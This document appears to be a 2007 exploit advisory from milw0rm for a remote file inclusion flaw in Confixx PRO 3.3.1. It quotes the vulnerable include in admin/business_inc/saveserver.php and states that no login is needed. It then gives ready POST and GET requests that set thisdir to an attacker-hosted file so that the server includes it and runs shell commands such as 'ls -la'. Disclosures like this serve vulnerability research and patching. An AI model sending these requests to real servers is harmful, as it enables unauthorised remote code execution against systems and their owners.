1
2 [*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
3 __________________________________________________________________________
4
5 [!] Application homepage : http://www.swsoft.com/de/products/confixx/
6 [!] Author : H4 / XPK
7 [!] Contact : http://xpkzxc.com/
8 [!] Bug discovered : 2007−07−21
9 [!] Bug published : 2007−07−24
10 [!] Risk : Moderate
11
12 Do not forget visit our page for new vulnerabilites , information and tools.
13
14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
15
16 Vuln. code: admin/business_inc/saveserver.php
17
18 Lines 8−11
19
20 if( !in_array($returnto, $actions) )
21 {
22 include( $thisdir . "/business_inc/list.php" );
23 }
24
25 Variable $thisdir is not defined ...
26
27 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
28
29 An attacker does not need to be authenticated to access this file.
30
31 [!] Conditions: open_basedir restriction off and allow_url_fopen = on
32
33 [!] Exploitation : http://[target]/admin/business_inc/saveserver.php
34
35 Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls −la
36 Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls −la
37
38 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
39
40 # milw0rm.com [2007−07−24]
Page 1/1
Confixx Pro 3.3.1 saveserver.php Remote File Inclusion Vulnerability
H4 / XPK
07/24/2007